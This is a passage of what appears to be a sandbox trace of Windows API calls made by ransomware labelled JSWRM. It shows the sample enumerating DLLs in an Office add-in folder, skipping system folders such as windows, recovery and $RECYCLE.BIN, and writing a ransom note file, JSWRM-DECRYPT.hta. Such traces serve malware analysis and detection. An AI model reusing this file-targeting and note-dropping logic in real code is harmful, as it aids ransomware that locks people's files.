out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7d7750, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7d7750, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7d7750, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbad0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", lpString2=".") returned 1 [0124.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", lpString2="..") returned 1 [0124.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", lpString2="...") returned 1 [0124.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", lpString2="windows") returned -1 [0124.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", lpString2="recovery") returned -1 [0124.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", lpString2="perflogs") returned -1 [0124.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", lpString2="documents and settings") returned 1 [0124.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", lpString2="system volume information") returned -1 [0124.783] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", lpString2="msocache") returned -1 [0124.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0124.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0124.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0124.784] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", cchWideChar=67, lpMultiByteStr=0x22c010, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", lpUsedDefaultChar=0x0) returned 67 [0124.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0124.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0124.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0124.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0124.787] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", cchWideChar=67, lpMultiByteStr=0x22c118, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.Entry.Interfaces.dll", lpUsedDefaultChar=0x0) returned 67 [0124.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0124.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245338 [0124.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0124.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0124.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0124.787] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaac403, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaac403, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf71003, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf710, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.ReportingServices.AdomdDataExtension.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0124.788] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.dll", lpString2=".") returned 1 [0124.788] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.dll", lpString2="..") returned 1 [0124.788] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.dll", lpString2="...") returned 1 [0124.788] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.dll", lpString2="windows") returned -1 [0124.788] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.dll", lpString2="recovery") returned -1 [0124.788] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.dll", lpString2="perflogs") returned -1 [0124.788] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.dll", lpString2="documents and settings") returned 1 [0124.788] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.788] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.dll", lpString2="system volume information") returned -1 [0124.788] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.dll", lpString2="msocache") returned -1 [0124.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0124.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0124.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.dll", cchWideChar=50, lpMultiByteStr=0x20dde8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.dll", lpUsedDefaultChar=0x0) returned 50 [0124.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0124.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0124.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0124.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.dll", cchWideChar=50, lpMultiByteStr=0x20dba8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.dll", lpUsedDefaultChar=0x0) returned 50 [0124.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0124.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e8b8 [0124.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245338 | out: hHeap=0x1e0000) returned 1 [0124.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.791] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.791] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x860e337, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x860e337, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x863456d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10c60, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.ReportingServices.Authorization.dll", cAlternateFileName="MIBBB9~1.DLL")) returned 1 [0124.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.Authorization.dll", lpString2=".") returned 1 [0124.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.Authorization.dll", lpString2="..") returned 1 [0124.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.Authorization.dll", lpString2="...") returned 1 [0124.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.Authorization.dll", lpString2="windows") returned -1 [0124.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.Authorization.dll", lpString2="recovery") returned -1 [0124.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.Authorization.dll", lpString2="perflogs") returned -1 [0124.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.Authorization.dll", lpString2="documents and settings") returned 1 [0124.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.Authorization.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.Authorization.dll", lpString2="system volume information") returned -1 [0124.791] lstrcmpiW (lpString1="Microsoft.ReportingServices.Authorization.dll", lpString2="msocache") returned -1 [0124.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0124.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Authorization.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0124.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.791] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Authorization.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Authorization.dll", lpUsedDefaultChar=0x0) returned 45 [0124.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0124.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0124.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Authorization.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0124.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Authorization.dll", cchWideChar=45, lpMultiByteStr=0x22d0a0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Authorization.dll", lpUsedDefaultChar=0x0) returned 45 [0124.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0124.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0124.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0124.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.792] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4c3d17b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4c3d17b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4c63313, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfc60, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.ReportingServices.Interfaces.dll", cAlternateFileName="MI2DB2~1.DLL")) returned 1 [0124.792] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2=".") returned 1 [0124.792] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="..") returned 1 [0124.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="...") returned 1 [0124.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="windows") returned -1 [0124.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="recovery") returned -1 [0124.794] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="perflogs") returned -1 [0124.794] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="documents and settings") returned 1 [0124.794] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.794] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="system volume information") returned -1 [0124.794] lstrcmpiW (lpString1="Microsoft.ReportingServices.Interfaces.dll", lpString2="msocache") returned -1 [0124.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0124.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Interfaces.dll", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0124.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Interfaces.dll", cchWideChar=42, lpMultiByteStr=0x22d0a0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Interfaces.dll", lpUsedDefaultChar=0x0) returned 42 [0124.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0124.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0124.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Interfaces.dll", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0124.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Interfaces.dll", cchWideChar=42, lpMultiByteStr=0x22cdc8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Interfaces.dll", lpUsedDefaultChar=0x0) returned 42 [0124.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0124.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1ef7e0 [0124.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0124.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.796] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.796] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7641936, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7641936, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7beb2bc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5556e8, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.ReportingServices.ProgressiveProcessing.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.796] lstrcmpiW (lpString1="Microsoft.ReportingServices.ProgressiveProcessing.dll", lpString2=".") returned 1 [0124.796] lstrcmpiW (lpString1="Microsoft.ReportingServices.ProgressiveProcessing.dll", lpString2="..") returned 1 [0124.796] lstrcmpiW (lpString1="Microsoft.ReportingServices.ProgressiveProcessing.dll", lpString2="...") returned 1 [0124.796] lstrcmpiW (lpString1="Microsoft.ReportingServices.ProgressiveProcessing.dll", lpString2="windows") returned -1 [0124.796] lstrcmpiW (lpString1="Microsoft.ReportingServices.ProgressiveProcessing.dll", lpString2="recovery") returned -1 [0124.796] lstrcmpiW (lpString1="Microsoft.ReportingServices.ProgressiveProcessing.dll", lpString2="perflogs") returned -1 [0124.796] lstrcmpiW (lpString1="Microsoft.ReportingServices.ProgressiveProcessing.dll", lpString2="documents and settings") returned 1 [0124.797] lstrcmpiW (lpString1="Microsoft.ReportingServices.ProgressiveProcessing.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.797] lstrcmpiW (lpString1="Microsoft.ReportingServices.ProgressiveProcessing.dll", lpString2="system volume information") returned -1 [0124.797] lstrcmpiW (lpString1="Microsoft.ReportingServices.ProgressiveProcessing.dll", lpString2="msocache") returned -1 [0124.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0124.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ProgressiveProcessing.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0124.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0124.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ProgressiveProcessing.dll", cchWideChar=53, lpMultiByteStr=0x20d920, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ProgressiveProcessing.dll", lpUsedDefaultChar=0x0) returned 53 [0124.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0124.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0124.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ProgressiveProcessing.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0124.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ProgressiveProcessing.dll", cchWideChar=53, lpMultiByteStr=0x20dde8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ProgressiveProcessing.dll", lpUsedDefaultChar=0x0) returned 53 [0124.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0124.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dee0 [0124.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ef7e0 | out: hHeap=0x1e0000) returned 1 [0124.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0124.799] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42fef17, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x15ab259c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x15ab259c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="ms", cAlternateFileName="")) returned 1 [0124.799] lstrcmpiW (lpString1="ms", lpString2=".") returned 1 [0124.799] lstrcmpiW (lpString1="ms", lpString2="..") returned 1 [0124.799] lstrcmpiW (lpString1="ms", lpString2="...") returned 1 [0124.799] lstrcmpiW (lpString1="ms", lpString2="windows") returned -1 [0124.799] lstrcmpiW (lpString1="ms", lpString2="recovery") returned -1 [0124.799] lstrcmpiW (lpString1="ms", lpString2="perflogs") returned -1 [0124.799] lstrcmpiW (lpString1="ms", lpString2="documents and settings") returned 1 [0124.799] lstrcmpiW (lpString1="ms", lpString2="$RECYCLE.BIN") returned 1 [0124.799] lstrcmpiW (lpString1="ms", lpString2="system volume information") returned -1 [0124.799] lstrcmpiW (lpString1="ms", lpString2="msocache") returned -1 [0124.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0124.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0124.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0124.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0124.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0124.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0124.800] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ms\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ms\\jswrm-decrypt.hta")) returned 0xffffffff [0124.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0124.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0124.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0124.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0124.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0124.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0124.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0124.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ms\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ms\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.808] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.808] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.815] CloseHandle (hObject=0x314) returned 1 [0124.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0124.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0124.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0124.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0124.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0124.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0124.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0124.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0124.816] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ms\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ms\\jswrm-decrypt.hta")) returned 0x20 [0124.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0124.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 